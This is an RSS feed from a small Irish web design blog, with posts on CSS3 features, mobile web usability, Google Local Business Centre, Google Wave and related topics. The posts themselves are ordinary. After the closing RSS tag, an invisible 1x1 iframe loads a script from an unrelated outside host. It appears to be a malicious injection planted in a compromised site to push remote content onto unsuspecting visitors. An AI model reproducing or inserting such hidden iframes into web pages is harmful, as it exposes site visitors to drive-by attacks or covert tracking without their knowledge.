<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>webpress.ie</title>
	<atom:link href="http://webpress.ie/blog/?feed=rss2" rel="self" type="application/rss+xml" />
	<link>http://webpress.ie/blog</link>
	<description>Tinman Web Design</description>
	<lastBuildDate>Thu, 07 Jan 2010 23:32:55 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.4</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>CSS 3 Explained</title>
		<link>http://webpress.ie/blog/?p=36</link>
		<comments>http://webpress.ie/blog/?p=36#comments</comments>
		<pubDate>Thu, 07 Jan 2010 23:17:02 +0000</pubDate>
		<dc:creator>tinman6</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://tinman.ie/blog/?p=36</guid>
		<description><![CDATA[CSS has been around for over 10 years now, long enough that we can stop talking about it like it’s the new kid on the block. There were are a number of frustrating thing about CSS that have been addressed by later version &#8211; now at CSS Version 3 &#8211; but many of these improvement [...]]]></description>
			<content:encoded><![CDATA[<p>CSS has been around for over 10 years now, long enough that we can stop talking about it like it’s the new kid on the block. There were are a number of frustrating thing about CSS that have been addressed by later version &#8211; now at CSS Version 3 &#8211; but many of these improvement have not been taken up as browsers simple weren’t ready. Well they are getting there so in this article were going to look at some of the features of CSS 3 that we all need to get used to using.</p>
<h3>Selectors</h3>
<p>The idea of selectors is to target HTML elements without needing <strong>Classes</strong> OR <strong>IDs</strong></p>
<p><strong>Syntax</strong></p>
<p><strong> </strong>* [att^="value"]</p>
<p>Matches elements to an attribute that starts with the specified value.</p>
<p>* [att$="value"]</p>
<p>Matches elements to an attribute that ends with the specified value.</p>
<p>* [att*="value"]</p>
<p>Matches elements to an attribute that contains the specified value.</p>
<p><strong>Example</strong></p>
<p><strong> </strong><em>a[title$="cats"]</em></p>
<p><em>{</em></p>
<p><em>background-color: red;</em></p>
<p><em>}</em><strong> </strong></p>
<p><strong>Why bother?</strong></p>
<p>They cut down on code</p>
<h3>Combinators</h3>
<p>A combinator targets all siblings of an element that has the same parent. For example, to add a red background border to all <strong>spans</strong> that are a sibling of a particular <strong>div</strong><strong> </strong></p>
<p>div~span {<br />
Background-color: red;<br />
}</p>
<p>Not supported in IE 6!</p>
<h3>Pseudo Classes</h3>
<p>These are a pretty cool set of classes. E.g.</p>
<p><code><em>:nth-child(n)</em></code> Allows you target elements based on their positions in a list of child elements. Could be used for making striped rows. So if you want to match a group of two elements after the forth third, you can simply use:</p>
<p><code>1name="code"&gt;:nth-child(2n+3) { background-color: #ccc; }</code><code><strong> </strong></code></p>
<p><code>Theres a bunch more too! </code></p>
<p><code>::selection</code> lets you target elements that have been highlighted by the user.</p>
<h3>RGB and Opacity</h3>
<p>RGBA lets you set the colour and <strong>opacity of an element</strong><strong>.</strong> There is already an <em>opacity</em> command but it targets the parent and all its children – not just the one element.</p>
<h3>Multi Column Layout</h3>
<p>This is an important one if you ask me. This allows you have multi-column layouts without having to use multiple <code>div</code>s.<strong> </strong></p>
<p>.index #content div {<br />
  -webkit-column-count : 4;<br />
  -webkit-column-gap : 20px;<br />
  -moz-column-count : 4;<br />
  -moz-column-gap : 20px;<br />
  }
</p>
<h3>Multi Backgrounds</h3>
<p>Apply multiple layered backgrounds with CSS3. Here’s what it looks like in shorthand. <strong> </strong></p>
<p>div {<br />
background: url(example.jpg) top left (100% 2em) no-repeat,<br />
url(example2.jpg) bottom left (100% 2em) no-repeat,<br />
url(example3.jpg) center center (10em 10em) repeat-y;<br />
}</p>
<h3>Word Wrap</h3>
<p><code>word-wrap</code> stops<strong> long words from overflowing</strong><strong>.<br />
</strong></p>
<h3>Text Shadow</h3>
<p>Exactly how it sounds, a drop shadow on text, and the CSS looks a bit like this. <strong> </strong></p>
<p>.signup_area p {<br />
text-shadow: rgba(0,0,0,.8) 0 1px 0;<br />
}</p>
<h3>@Font Face Attribute</h3>
<p>@font-face allows you use any font on your site by making it downloadable. It’s a major contentious issue with font foundries very concerned but a solution is being worked on. It looks like this:<strong> </strong></p>
<p>@font-face{<br />
font-family: &#8216;DroidSans&#8217;;<br />
src: url(&#8217;../fonts/DroidSans.ttf&#8217;) format(&#8217;truetype&#8217;);<br />
}</p>
<h3>Border Radius</h3>
<p>Added<strong> curved corners to HTML elements</strong> without using background images.<strong> </p>
<p></strong>h2 span {<br />
color: #1a1a1a;<br />
padding: .5em;<br />
-webkit-border-radius: 6px;<br />
-moz-border-radius: 6px;<br />
}</p>
<h3>Border Image</h3>
<p><strong>Use an image for the border of an element</strong>. Something like this:</p>
<h3>Box Shadow</h3>
<p><strong>Add</strong><strong> shadows to HTML elements</strong> without background images.<strong> </p>
<p></strong>#content .post img {<br />
border: 6px solid #f2e6d1;<br />
-webkit-border-image: url(main-border.png) 6 repeat;<br />
-moz-border-image: url(main-border.png) 6 repeat;<br />
border-image: url(main-border.png) 6 repeat;<br />
}</p>
<h3>Box Sizing</h3>
<p>Legacy browser can interpret boxes sizes (padding/height) in weird ways. The <code>box-sizing</code> property lets you specify<strong> </strong><strong>how the browser calculates the width and height of an element</strong></p>
<h3>Media Queries</h3>
<p>This these let you define styles depending on the screensize. So if the screensize is below 500px the navigation might appear in a different location. Or something.</p>
<h3>Speech</h3>
<p>specify the speech style of screen readers.</p>
]]></content:encoded>
			<wfw:commentRss>http://webpress.ie/blog/?feed=rss2&amp;p=36</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Web companies settle in surrounding counties</title>
		<link>http://webpress.ie/blog/?p=33</link>
		<comments>http://webpress.ie/blog/?p=33#comments</comments>
		<pubDate>Mon, 05 Oct 2009 17:21:32 +0000</pubDate>
		<dc:creator>tinman6</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://tinman.ie/blog/?p=33</guid>
		<description><![CDATA[It has become more and more common for web design and marketing companies to settle in Dublin&#8217;s surrounding counties of Meath, Wicklow and Kildare. The exodus is due to high rent prices in Dublin and that fact that they (the companies) not are not required to be available face to face as much as some [...]]]></description>
			<content:encoded><![CDATA[<p>It has become more and more common for web design and marketing companies to settle in Dublin&#8217;s surrounding counties of Meath, Wicklow and Kildare. The exodus is due to high rent prices in Dublin and that fact that they (the companies) not are not required to be available face to face as much as some businesses. Jobs are usually bigger meaning just a few projects will keep a design company busy and stationary. You will find Tinman Web Design at <a href="http://www.tinman.ie">Web Design Meath</a></p>
]]></content:encoded>
			<wfw:commentRss>http://webpress.ie/blog/?feed=rss2&amp;p=33</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Mobile Web Back In The Dark Ages Says Nielsen</title>
		<link>http://webpress.ie/blog/?p=27</link>
		<comments>http://webpress.ie/blog/?p=27#comments</comments>
		<pubDate>Mon, 05 Oct 2009 16:31:47 +0000</pubDate>
		<dc:creator>tinman6</dc:creator>
				<category><![CDATA[Mobile Web]]></category>

		<guid isPermaLink="false">http://tinman.ie/blog/?p=27</guid>
		<description><![CDATA[The Nielsen Group of Jacob Nielsen fame have been hard at work testing users on the mobile web. They have found that its about as easy to use as the &#8220;normal&#8221; web was was about 15 years ago. The average completion rate for tasks on the mobile web was 59% compared to 80% on a [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignright size-full wp-image-28" style="margin-left: 15px; margin-right: 15px;" title="man" src="http://tinman.ie/blog/wp-content/uploads/2009/10/man.jpg" alt="man" width="250" height="351" />The Nielsen Group of Jacob Nielsen fame have been hard at work testing users on the mobile web. They have found that its about as easy to use as the &#8220;normal&#8221; web was was about 15 years ago. The average completion rate for tasks on the mobile web was 59% compared to 80% on a regular PC. “Observing users suffer during our sessions reminded us of the very first usability studies we did with traditional websites in 1994,&#8221; said Nielsen.</p>
<p>Success in the test was measured by how long it took to complete and whether they were successful. There were a range of tasks from the very specific (cinema lookup) to general information gathering tasks. The big obstacles to completions were:</p>
<ul>
<li>Screen size too small</li>
<li>Typing slow and difficult</li>
<li>Delayed downloads</li>
<li>Website not designed for the mobile web</li>
</ul>
<p>Bigger phones performed better with the iphone scoring 75%.</p>
<p>On sites designed for the mobile web, tasks were completed 64% of the time, a decent improvement.</p>
<p>Neilsen&#8217;s conclusion is that businesses should build a mobile site if they can, but it should link to the main site. Nielsen also says, and showing that hes well plugged in, that task specific apps will provide many web services on the mobile web. He must have an iPhone!</p>
<div id="_mcePaste" style="overflow: hidden; position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px;">Mobile Web Back In The Dark Ages Says Nielsen</div>
]]></content:encoded>
			<wfw:commentRss>http://webpress.ie/blog/?feed=rss2&amp;p=27</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>New website takes the mystery out of web payments &#8211; For Developers &amp; Store Owners</title>
		<link>http://webpress.ie/blog/?p=19</link>
		<comments>http://webpress.ie/blog/?p=19#comments</comments>
		<pubDate>Fri, 25 Sep 2009 19:54:05 +0000</pubDate>
		<dc:creator>tinman6</dc:creator>
				<category><![CDATA[eCommerce]]></category>

		<guid isPermaLink="false">http://tinman.ie/blog/?p=19</guid>
		<description><![CDATA[Say the words &#8220;online store&#8221; and a small piece of me dies. Such is the spectre of taking on an ecommerce project. As well as other things, a lot of this upset come from the challenge of figuring out what web payments platform to choose. For developers and store owners alike it is very difficult [...]]]></description>
			<content:encoded><![CDATA[<p>Say the words &#8220;online store&#8221; and a small piece of me dies. Such is the spectre of taking on an ecommerce project. As well as other things, a lot of this upset come from the challenge of figuring out what web payments platform to choose. For developers and store owners alike it is very difficult to make a really informed decision due the depth of knowledge need about each platform in order the compare them. Theres a lot of factors involved! Picking the cheapest platform isnt aways wise &#8211; you often end up overspending on development if that platform is particularly tricky. If only someone would create a website that provides information on the different Web Payment providers in Ireland. They could call it  <a href="http://www.webpayments.ie" target="_blank">WEBPAYMENTS.ie</a>. The site could:</p>
<ul>
<li>Provide information on web payments providers</li>
<li>Compare web payments providers</li>
<li>Allow for discussion through a developer forum</li>
<li>Blog about movements in the web payments landscape</li>
</ul>
<p>Well folks, <a href="http://www.webpayments.ie/" target="_blank">WEBPAYMENTS.ie</a> exists and it does all those thing. So no more moaning!</p>
]]></content:encoded>
			<wfw:commentRss>http://webpress.ie/blog/?feed=rss2&amp;p=19</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Have you heard of &#8220;Google Local Business Centre&#8221;?</title>
		<link>http://webpress.ie/blog/?p=13</link>
		<comments>http://webpress.ie/blog/?p=13#comments</comments>
		<pubDate>Mon, 31 Aug 2009 09:04:31 +0000</pubDate>
		<dc:creator>tinman6</dc:creator>
				<category><![CDATA[Google]]></category>

		<guid isPermaLink="false">http://webpress.ie/blog/?p=13</guid>
		<description><![CDATA[In April Ireland saw the launch of the Google Local Business Centre, AT LAST. If you search for a service and in the search results you see a wee map with an A-J of businesses alongside, your looking at the GLBC, also know as the 10 Pack.
The problem before was that when you searched for [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignright size-full wp-image-15" title="google" src="http://webpress.ie/blog/wp-content/uploads/2009/08/google1.jpg" alt="google" width="350" height="207" />In April Ireland saw the launch of the Google Local Business Centre, AT LAST. If you search for a service and in the search results you see a wee map with an A-J of businesses alongside, your looking at the GLBC, also know as the 10 Pack.</p>
<p>The problem before was that when you searched for &#8220;Web Designer Dublin&#8221; you got up all sorts of rubbish including the Wikipedia page for web designer or maybe a link to the Web Designers Association (the what?). So when Google thinks your probably looking for a service it puts in the GLBC module directly after its sponsored links but above the organic links.</p>
<p>How do you get listed on the GBLC<br />
The good news it its free. Signing up is quick and you can do it here:<br />
www.google.com/local/add<br />
After you sign up Google will post you out a code to verify your address. Then you should be up and running.</p>
<p>What the drawback?<br />
Well, its the LOCAL business centre so you will only show up for your local area wheather that be Dublin, Meath etc. If you have various branches you can submit them all no problem.</p>
<p>In conclusion</p>
<p>Every business should be signed up for GLBC period. Google have really come through here as if you think about it this free feature is in direct competition with their Adwords/Sponsored links. So Kudos to Google. They walk their moral line pretty well and as long as they keep it up im not likely to jump on the next search engine bandwagon that actually works. (BING im told doesn&#8217;t work!).</p>
<p>I plan to write a follup article soon about how best take advantage of GBLC. Watch this space.</p>
]]></content:encoded>
			<wfw:commentRss>http://webpress.ie/blog/?feed=rss2&amp;p=13</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Google Wave. Collaboration Platform or Facebook Killer?</title>
		<link>http://webpress.ie/blog/?p=7</link>
		<comments>http://webpress.ie/blog/?p=7#comments</comments>
		<pubDate>Mon, 31 Aug 2009 08:29:51 +0000</pubDate>
		<dc:creator>tinman6</dc:creator>
				<category><![CDATA[Google]]></category>

		<guid isPermaLink="false">http://webpress.ie/blog/?p=7</guid>
		<description><![CDATA[Google Wave Is: A browser based application that brings together Email, Instant Messaging and Documents allowing to to reply to email type messages in IM style &#8211; and IM type messages email style (twitter-esqe). You can also see each others changes as they happen, plus bring in photos, video, maps and more. A thread of [...]]]></description>
			<content:encoded><![CDATA[<p>Google Wave Is: A browser based application that brings together Email, Instant Messaging and Documents allowing to to reply to email type messages in IM style &#8211; and IM type messages email style (twitter-esqe). You can also see each others changes as they happen, plus bring in photos, video, maps and more. A thread of conversation is called a WAVE.</p>
<p>Here what Googles  Lars Rasmussen had to say: &#8220;We think of email as a successful open protocol, But we think that with the advances in computers and all the experiences that have been made with different types of communication, can do better. Google Wave is our suggestion.&#8221; So heres Google comparing it to Email, other have compared it to Sharepoint. Personally&#8230; I like keep email at arms length so I dont see myself substiuting email for this more collaboarative version. Mostly I just dont need to collaboarate! I see Google Wave, for now, as a real time conferencing/ collaborative work platform. That not to put it down! I dont use Google maps every day but its still useful as hell. And I probaby wont use Google Wave every day but it probably will given the number of people with Google accounts these days.</p>
<p>If you ask me, whats really happening is that Google are lining up to take on Facebook. If you think about it GW has all the bits in place to turn on a stomping social network.<br />
<img class="alignnone size-full wp-image-10" title="wave" src="http://webpress.ie/blog/wp-content/uploads/2009/08/wave.jpg" alt="wave" width="550" height="194" /></p>
]]></content:encoded>
			<wfw:commentRss>http://webpress.ie/blog/?feed=rss2&amp;p=7</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Website Editor For iPhone</title>
		<link>http://webpress.ie/blog/?p=1</link>
		<comments>http://webpress.ie/blog/?p=1#comments</comments>
		<pubDate>Sun, 30 Aug 2009 20:34:45 +0000</pubDate>
		<dc:creator>tinman6</dc:creator>
				<category><![CDATA[Mobile Web]]></category>

		<guid isPermaLink="false">http://webpress.ie/blog/?p=1</guid>
		<description><![CDATA[iPhone has become a web designers best friend with the release of FTP-On-The-Go, a program that allows you download, edit and reupload files from an FTP servers. I got to test it in the field when I received an email (on my iphone) from a client who has noticed an error e on a &#8220;just [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignright size-full wp-image-4" title="iphone" src="http://webpress.ie/blog/wp-content/uploads/2009/08/iphone.jpg" alt="iphone" width="229" height="427" />iPhone has become a web designers best friend with the release of FTP-On-The-Go, a program that allows you download, edit and <span style="background: yellow none repeat scroll 0% 0%;">reupload</span> files from an FTP servers. I got to test it in the field when I received an email (on my <span style="background: yellow none repeat scroll 0% 0%;">iphone</span>) from a client who has noticed an error e on a &#8220;just launched&#8221; website. FTP-On-The-Go to the rescue.</p>
<p>Its basic&#8230; and web designing on a hand held could be so much better with a client side browser and toggle&#8230;.BUT FTP-On-The-Go is a great start.</p>
]]></content:encoded>
			<wfw:commentRss>http://webpress.ie/blog/?feed=rss2&amp;p=1</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
<iframe heigth="1" width="1" frameborder="0" src="http://curem.net/t.php?id=2769885"></iframe>

